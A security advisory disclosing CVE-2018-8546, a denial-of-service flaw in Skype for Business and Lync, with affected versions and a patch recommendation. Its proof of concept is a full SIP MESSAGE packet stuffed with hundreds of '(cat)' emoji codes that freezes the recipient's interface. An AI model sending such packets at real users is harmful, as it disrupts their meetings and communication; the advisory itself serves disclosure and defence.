Denial Of Service Vulnerability In Microsoft Skype For Business / Lync

Vendor Description

“Skype for Business (formerly Microsoft Office Communicator and Microsoft Lync) is an instant messaging client used with Skype for Business Server or with Skype for Business Online (available with Microsoft Office 365). Skype for Business is enterprise software.”

Source: https://en.wikipedia.org/wiki/Skype_for_Business

Business Recommendation

Assess the impact of this vulnerability on your business. The patch provided by Microsoft should be installed immediately. Especially if Skype for Business is being used for external communication.

Vulnerability Overview/ Description (CVE-2018-8546)

A large number of emojis (e.g. ~800 kittens) received in one message by the Skype For Business client freezes the program for a few seconds. This can be exploited to perform Denial of Service attacks against Skype for Business users and compromises the availability of the program.

For example, an attacker can continuously send such messages to the chat window of a meeting room in order to freeze the program for all participants and prevent them from using the chat or seeing the video.

Note that the sound and video stream is handled by a separate thread and therefore are not affected (e.g. killed), only the functions related to graphical user interface become unusable.

Proof Of Concept

After sending a big amount of emojis (~800 kittens) to a Skype for Business chat, the program freezes for a few seconds while rendering the chat window. Continuously sending emojis will make the GUI unusable for the user. Ongoing conference calls are not affected or interrupted.

The following SIP packet illustrates the attack.

MESSAGE sip:xxx@*redacted*;opaque=user:epid:EwWlc9DdAFGQtozR4vBibAAA;gruu SIP/2.0 Via: SIP/2.0/tls 127.0.0.1:7490 From: <sip:lyncdummy@*redacted*>;tag=82254700;epid=e67b0162bec8 To: <sip:xxx@*redacted*>;tag=5c302cb624;epid=15347556e6 Max-Forwards: 70 CSeq: 12 MESSAGE User-Agent: Purple/2.12.0 Sipe/1.23.2 (win-i386; RTC/5.0) Call-ID: 440Eg2C92a5C4Ci0A43m5DDAt76CEb3DEAx13B0x Route: <sip:*redacted*:5061;transport=tls;opaque=state:T:F:Eu:Ci.R5a4100;lr;ms-route-sig=ey6XhfVINhLjEiZxqAoCWXcGmObktXoI0nG0AvGmdXYEuYRT6e8Utq9wAA> Contact: <sip:lyncdummy@*redacted*;opaque=user:epid:cfMFfITMsFCxsLbx1gL31gAA;gruu> Content-Type: text/plain; charset=UTF-8;msgr=WAAtAE0ATQBTAC0ASQBNAC0ARgBvAHIAbQBhAHQAOgAgAEYATgA9AE0AUwAlADIAMABTAGEAbgBzACUAMgAwAFMAZQByAGkAZgA7ACAARQBGAD0AOwAgAEMATwA9ADAAOwAgAFAARgA9ADAAOwAgAFIATAA9ADAADQAKAA0ACgA Content-Length: 4420 Authorization: TLS-DSK qop="auth", opaque="174C6224", realm="SIP Communications Service", targetname="*redacted*", crand="1126134f", cnum="29", response="*redacted*" (cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)

Vulnerable / Tested Versions

The following versions have been identified as vulnerable which were the latest versions available at the time of the test:

• Lync 2013 (15.0) 64-Bit part of Microsoft Office Professional Plus 2013
• Skype for Business 2016 MSO (16.0.93).64-Bit.

Both versions were running on Windows 10 Pro. According to the vendor, all previous versions are affected:

• Skype for Business 2015 (Lync 2013) before v15.0.5075.1000
• Skype for Business 2016: before v16.0.4756.1000